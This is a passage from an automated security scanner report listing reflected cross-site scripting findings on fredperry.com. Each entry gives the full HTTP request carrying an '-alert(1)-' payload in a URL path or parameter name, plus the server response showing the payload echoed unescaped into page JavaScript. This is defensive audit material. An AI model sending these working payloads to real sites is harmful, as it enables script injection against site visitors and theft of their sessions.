Set-Cookie: frontend=qva44de22rhlahod84sf5ghjp5; expires=Tue, 09-Nov-2010 17:14:20 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition138a5"-alert(1)-"4cb6177581/women/collaboration/");
//]]>
...[SNIP]...

1.159. http://www.fredperry.com/limited-edition/women/collaboration/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/collaboration/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4b2d"-alert(1)-"4d7360fd3ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/womena4b2d"-alert(1)-"4d7360fd3ec/collaboration/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=itp8cta29gippdg6e6uvtl3bp4; expires=Tue, 09-Nov-2010 17:14:41 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/womena4b2d"-alert(1)-"4d7360fd3ec/collaboration/");
//]]>
...[SNIP]...

1.160. http://www.fredperry.com/limited-edition/women/collaboration/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/collaboration/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f83df"-alert(1)-"13320d1bbae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/collaborationf83df"-alert(1)-"13320d1bbae/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=j3khbiefp69vcvsjqi8s941rl2; expires=Tue, 09-Nov-2010 17:15:02 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/collaborationf83df"-alert(1)-"13320d1bbae/");
//]]>
...[SNIP]...

1.161. http://www.fredperry.com/limited-edition/women/collaboration/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/collaboration/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6261"-alert(1)-"b4c4364b0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/collaboration/?e6261"-alert(1)-"b4c4364b0e=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=irnsq15v08g7ekuep3cnvd35d0; expires=Tue, 09-Nov-2010 17:13:47 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/collaboration/?e6261"-alert(1)-"b4c4364b0e=1");
//]]>
...[SNIP]...

1.162. http://www.fredperry.com/limited-edition/women/dresses/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/dresses/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73620"-alert(1)-"1ba7f11b9ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition73620"-alert(1)-"1ba7f11b9ac/women/dresses/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=e8intv2rp1hb9gkg85kl8uqgk0; expires=Tue, 09-Nov-2010 17:20:09 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition73620"-alert(1)-"1ba7f11b9ac/women/dresses/");
//]]>
...[SNIP]...

1.163. http://www.fredperry.com/limited-edition/women/dresses/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/dresses/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83d54"-alert(1)-"bb802bcf9bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women83d54"-alert(1)-"bb802bcf9bd/dresses/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=4a96726nvsami438drr4261mh2; expires=Tue, 09-Nov-2010 17:20:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women83d54"-alert(1)-"bb802bcf9bd/dresses/");
//]]>
...[SNIP]...

1.164. http://www.fredperry.com/limited-edition/women/dresses/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/dresses/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5799"-alert(1)-"22e462446fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/dressesa5799"-alert(1)-"22e462446fd/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=rj7h8t5kopnlu85l3vbk8n3pk5; expires=Tue, 09-Nov-2010 17:20:55 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/dressesa5799"-alert(1)-"22e462446fd/");
//]]>
...[SNIP]...

1.165. http://www.fredperry.com/limited-edition/women/dresses/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/dresses/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8e44"-alert(1)-"7e71feb7166 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/dresses/?d8e44"-alert(1)-"7e71feb7166=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=fn2asjnfshrcqtg8d3famvtbs0; expires=Tue, 09-Nov-2010 17:18:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/dresses/?d8e44"-alert(1)-"7e71feb7166=1");
//]]>
...[SNIP]...

1.166. http://www.fredperry.com/limited-edition/women/footwear/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/footwear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75686"-alert(1)-"b840be228ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition75686"-alert(1)-"b840be228ba/women/footwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=16bb9ig1cuv3q2ccnvs9bm93m3; expires=Tue, 09-Nov-2010 17:20:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition75686"-alert(1)-"b840be228ba/women/footwear/");
//]]>
...[SNIP]...

1.167. http://www.fredperry.com/limited-edition/women/footwear/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/footwear/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c221"-alert(1)-"9b1cf35f8d5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women3c221"-alert(1)-"9b1cf35f8d5/footwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=s1avt2mbji989ud1j2vrglcht3; expires=Tue, 09-Nov-2010 17:21:09 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women3c221"-alert(1)-"9b1cf35f8d5/footwear/");
//]]>
...[SNIP]...

1.168. http://www.fredperry.com/limited-edition/women/footwear/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/footwear/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd092"-alert(1)-"6094c8a7c78 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/footweardd092"-alert(1)-"6094c8a7c78/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=b6lhr50bikil4piqe70n3448r3; expires=Tue, 09-Nov-2010 17:21:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/footweardd092"-alert(1)-"6094c8a7c78/");
//]]>
...[SNIP]...

1.169. http://www.fredperry.com/limited-edition/women/footwear/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/footwear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8f77"-alert(1)-"856a7d4a239 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/footwear/?a8f77"-alert(1)-"856a7d4a239=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=c7hjustpjqjnfs7q23teruvc77; expires=Tue, 09-Nov-2010 17:19:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/footwear/?a8f77"-alert(1)-"856a7d4a239=1");
//]]>
...[SNIP]...

1.170. http://www.fredperry.com/limited-edition/women/jackets/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jackets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d714e"-alert(1)-"dad4174515e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editiond714e"-alert(1)-"dad4174515e/women/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=i1pbkcdgphrua32fu64cjtdjc7; expires=Tue, 09-Nov-2010 17:21:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editiond714e"-alert(1)-"dad4174515e/women/jackets/");
//]]>
...[SNIP]...

1.171. http://www.fredperry.com/limited-edition/women/jackets/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jackets/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9b08"-alert(1)-"a3170872b3d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/womenf9b08"-alert(1)-"a3170872b3d/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7b7avsnog7a4k03461pv6n16t4; expires=Tue, 09-Nov-2010 17:21:27 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/womenf9b08"-alert(1)-"a3170872b3d/jackets/");
//]]>
...[SNIP]...

